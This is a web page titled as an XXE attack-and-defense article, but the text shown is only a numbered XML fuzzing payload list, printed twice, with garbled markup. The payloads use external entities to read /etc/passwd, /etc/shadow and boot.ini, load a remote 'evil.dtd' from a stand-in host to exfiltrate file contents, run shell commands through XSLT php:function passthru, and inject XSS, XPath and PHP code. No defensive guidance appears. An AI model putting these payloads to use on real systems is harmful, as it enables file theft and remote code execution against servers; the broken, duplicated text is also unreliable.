XXE (XML external entity injection) attack and defense

By XML

Fuzzing

 1 "php://filter/convert.base64-encode/resource=/etc/passwd">

 2 "1.0" encoding="ISO-8859-1"?>

 3 "aaaaaa">]>

 4 "aaaaaa">]>&foo;

 5 "1.0" encoding="ISO-8859-1"?>"aaaaaa">]>

 6 "1.0" encoding="ISO-8859-1"?>"aaaaaa">]>< root>&foo;

 7 "1.0" encoding="ISO-8859-1"?>

 8 "1.0" encoding="ISO-8859-1"?>"file:///etc/passwd" >]>&xxe;

 9 "1.0" encoding="ISO-8859-1"?>"file:///etc/passwd" >]>

10 "1.0" encoding="ISO-8859-1"?>"file:///etc/issue" >]>&xxe;

11 "1.0" encoding="ISO-8859-1"?>"file:///etc/issue" >]>

12 "1.0" encoding="ISO-8859-1"?>"file:///etc/shadow" >]>&xxe;

13 "1.0" encoding="ISO-8859-1"?>"file:///etc/shadow" >]>

14 "1.0" encoding="ISO-8859-1"?>"file:///c:/boot.ini" >]>&xxe;

15 "1.0" encoding="ISO-8859-1"?>"file:///c:/boot.ini" >]>

16 "1.0" encoding="ISO-8859-1"?>"http://example.com:80" >]>&xxe;

17 "1.0" encoding="ISO-8859-1"?>"http://example:443" >]>

18 "1.0" encoding="ISO-8859-1"?>"file:////dev/random">]>&xxe;

19 

20 ]]>

21 &foo;

22 %foo;

23 count(/child::node())

24 x' or name()='username'< span style="color: #800000;"> or 'x'='y

25 ','')); phpinfo(); exit ;/*

26 var n=0;while(true){n++;}]]>

27 ]]>alert('XSS');]]>

28 "1.0" encoding="ISO-8859-1"?>]]>alert('XSS');]]>

29 ]]>alert('XSS');]]>

30 "1.0" encoding="ISO-8859-1"?>' or 1=1 or '' =']]>

31 ' or 1=1 or "=']]>

32 "javas]]>">]]>

33 "xss"><IMG SRC= "javascript:alert('XSS')" >"#xss" DATAFLD="B" DATAFORMATAS="HTML">

34 "xsstest.xml" ID=I>< /SPAN>

35 

36 "xsstest.xml" ID=I>

37 namespace="xss" implementation ="http://ha.ckers.org/xss.htc">XSS

38 namespace="xss" implementation ="http://ha.ckers.org/xss.htc">

39 "1.0" xmlns:xsl="< span style="color: #800000;">http://www.w3.org/1999/XSL/Transform" xmlns:php ="http://php.net/xsl">"/">

40 "1.0" xmlns:xsl="< span style="color: #800000;">http://www.w3.org/1999/XSL/Transform" xmlns:php ="http://php.net/xsl">"/">select="document('/etc/passwd')"/>

41 "1.0" xmlns:xsl="< span style="color: #800000;">http://www.w3.org/1999/XSL/Transform" xmlns:php ="http://php.net/xsl">"/">select="php:function('passthru','ls -la')"/>

42 " file:///etc/passwd" >]>

43 " file:///etc/shadow" >]>

44 " file:///c:/boot.ini" >] >

45 " http://example.com/text.txt" >] >

46 " file:////dev/random">]>

47 int " "> %int;

48 " ">

49 "< span style="color: #800000;">file:///etc/issue">"http://example.com/evil.dtd">%dtd;%trick;]>

50 "< span style="color: #800000;">file:///c:/boot.ini">"http://example.com/evil.dtd">%dtd;%trick;]>

51 "http://xxxx:22/"< /span>> %dtd;]>]]>

 1 "php:// filter/convert.base64-encode/resource=/etc/passwd">

 2 "1.0" encoding="ISO-8859-1"?>

 3 "aaaaaa">]>

 4 "aaaaaa">]>&foo;

 5 "1.0" encoding="ISO-8859-1"?>"aaaaaa">]>

 6 "1.0" encoding="ISO-8859-1"?>"aaaaaa">]>< root>&foo;

 7 "1.0" encoding="ISO-8859-1"?>

 8 "1.0" encoding="ISO-8859-1"?>"file:///etc/passwd" >]>&xxe;

 9 "1.0" encoding="ISO-8859-1"?>"file:///etc/passwd" >]>

10 "1.0" encoding="ISO-8859-1"?>"file:///etc/issue" >]>&xxe;

11 "1.0" encoding="ISO-8859-1"?>"file:///etc/issue" >]>

12 "1.0" encoding="ISO-8859-1"?>"file:///etc/shadow" >]>&xxe;

13 "1.0" encoding="ISO-8859-1"?>"file:///etc/shadow" >]>

14 "1.0" encoding="ISO-8859-1"?>"file:///c:/boot.ini" >]>&xxe;

15 "1.0" encoding="ISO-8859-1"?>"file:///c:/boot.ini" >]>

16 "1.0" encoding="ISO-8859-1"?>"http://example.com:80" >]>&xxe;

17 "1.0" encoding="ISO-8859-1"?>"http://example:443" >]>

18 "1.0" encoding="ISO-8859-1"?>"file:////dev/random">]>&xxe;

19 

20 ]]>

21 &foo;

22 %foo;

23 count(/child::node())

24 x' or name()='username'< span style="color: #800000;"> or 'x'='y

25 ','')); phpinfo(); exit ;/*

26 var n=0;while(true){n++;}]]>

27 ]]>alert('XSS');]]>

28 "1.0" encoding="ISO-8859-1"?>]]>alert('XSS');]]>

29 ]]>alert('XSS');]]>

30 "1.0" encoding="ISO-8859-1"?>' or 1=1 or '' =']]>

31 ' or 1=1 or "=']]>

32 "javas]]>">]]>

33 "xss"><IMG SRC= "javascript:alert('XSS')" >"#xss" DATAFLD="B" DATAFORMATAS="HTML">

34 "xsstest.xml" ID=I>< /SPAN>

35 

36 "xsstest.xml" ID=I>

37 namespace="xss" implementation="http://ha.ckers.org/xss.htc">XSS

38 namespace="xss" implementation="http://ha.ckers.org/xss.htc">

39 "1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">"/">

40 "1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">"/">select="document(‘/etc/passwd‘)"/>

41 "1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">"/">select="php:function(‘passthru‘,‘ls -la‘)"/>

42 "file:///etc/passwd" >]>

43 "file:///etc/shadow" >]>

44 "file:///c:/boot.ini" >]>

45 "http://example.com/text.txt" >]>

46 "file:////dev/random">]>

47 int "  "> %int;

48 "">

49 "file:///etc/issue">"http://example.com/evil.dtd">%dtd;%trick;]>

50 "file:///c:/boot.ini">"http://example.com/evil.dtd">%dtd;%trick;]>

51 "http://x.x.x.x:22/"> %dtd;]>]]>

, , , , , ,

Leave a Comment

Your email address will not be published.